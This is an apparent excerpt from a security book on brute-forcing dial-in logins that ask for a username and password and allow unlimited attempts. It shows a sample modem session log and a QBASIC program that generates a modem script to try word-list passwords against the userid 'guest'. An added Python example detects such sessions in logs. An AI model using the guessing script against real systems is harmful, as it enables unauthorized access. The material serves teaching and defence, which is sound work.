Domain3

Brute Force Domain 3: Dual Authentication, Unlimited Attempts
(Excerpts from Hacking Exposed, written by Stephan Barnes "M4phr1k")

Our third domain builds on our first, but because there are now two things to guess (provided you don't already know a userid), the process theoretically takes more time to execute than our 1st and 2nd domain examples. We should also mention that this 3rd domain and the upcoming 4th domain process can be delicate, since theoretically more keystrokes are being transferred to the target system: there is more chance for something to go wrong. The scripts used to build these types of brute force approaches are similar in concept to the ones demonstrated above. (FIG 6) shows a target and (FIG 7) shows an example QBASIC program to make the ASPECT script.

(FIG 6)

XX-Jul-XX 09:55:08 91XXX5551234 C: CONNECT 9600/ARQ/V32/LAPM

Username: guest
Password: xxxxxxxx
Username: guest
Password: xxxxxxxx
Username: guest
Password: xxxxxxxx
Username: guest
Password: xxxxxxxx
Username: guest
Password: xxxxxxxx
Username: guest
Password: xxxxxxxx

(goes on unlimited)

(FIG 7)

QBASIC program (called 5551235.BAS)

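' Output: the generated ASPECT script. Input: the word list, one guess per line.
OPEN "5551235.was" FOR OUTPUT AS #2
OPEN "LIST.txt" FOR INPUT AS #1
PRINT #2, "proc main"
PRINT #2, "dial DATA " + CHR$(34) + "5551235" + CHR$(34)
' Emit one Username:/Password: exchange per word in LIST.txt.
DO UNTIL EOF(1)
LINE INPUT #1, in$
' Strip leading blanks and append ^M (carriage return) to the guess.
in$ = LTRIM$(in$) + "^M"
PRINT #2, "waitfor " + CHR$(34) + "Username:" + CHR$(34)
' The userid is held constant at "guest"; only the password varies.
PRINT #2, "transmit " + CHR$(34) + "guest" + CHR$(34)
PRINT #2, "waitfor " + CHR$(34) + "Password:" + CHR$(34)
PRINT #2, "transmit " + CHR$(34) + in$ + CHR$(34)
LOOP
PRINT #2, "endproc"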
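
Seen from the answering side, a session like FIG 6 stands out in captured dial-in logs: many Username:/Password: prompt pairs on a single CONNECT, usually with one userid held constant as in FIG 7. The Python below is an added example, not code from the book; it parses a capture in the FIG 6 layout and reports such sessions. The sample log is constructed, and the `max_attempts=3` threshold and the function names are assumptions.

```python
import re
from collections import Counter

# Constructed sample capture in the FIG 6 layout (not real data): six prompt
# pairs on one connection, then a second connection with a single login.
CONNECT = "XX-Jul-XX {t} 91XXX5551234 C: CONNECT 9600/ARQ/V32/LAPM\n\n"
ATTEMPT = "Username: {u}\nPassword: xxxxxxxx\n"
SAMPLE_LOG = (CONNECT.format(t="09:55:08") + ATTEMPT.format(u="guest") * 6
              + CONNECT.format(t="10:02:41") + ATTEMPT.format(u="alice"))

CONNECT_RE = re.compile(r"^(?P<stamp>\S+ \S+) (?P<line>\S+) C: CONNECT\b")
USER_RE = re.compile(r"^Username:\s*(?P<user>\S*)")

def parse_sessions(log_text):
    """Split a capture into sessions; every CONNECT line opens a new one."""
    sessions = []
    for raw in log_text.splitlines():
        line = raw.strip()
        connect = CONNECT_RE.match(line)
        user = USER_RE.match(line)
        if connect:
            sessions.append({"stamp": connect["stamp"], "line": connect["line"],
                             "users": [], "passwords": 0})
        elif sessions and user:
            sessions[-1]["users"].append(user["user"])
        elif sessions and line.startswith("Password:"):
            sessions[-1]["passwords"] += 1
    return sessions

def flag_unlimited_attempts(sessions, max_attempts=3):
    """Report sessions with more prompt pairs than max_attempts (assumed policy)."""
    findings = []
    for s in sessions:
        attempts = max(len(s["users"]), s["passwords"])
        if attempts <= max_attempts:
            continue
        userid, hits = Counter(s["users"]).most_common(1)[0] if s["users"] else ("", 0)
        findings.append({
            "stamp": s["stamp"], "line": s["line"], "attempts": attempts,
            "dual_auth": bool(s["users"]) and s["passwords"] > 0,
            # One userid repeated on every prompt matches the FIG 7 pattern.
            "fixed_userid": hits > 0 and hits == len(s["users"]),
            "userid": userid,
        })
    return findings

if __name__ == "__main__":
    for finding in flag_unlimited_attempts(parse_sessions(SAMPLE_LOG)):
        print(finding)
```

Any session this reports means the answering system let one caller keep guessing without dropping the connection, which is the condition this domain depends on.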

 

 
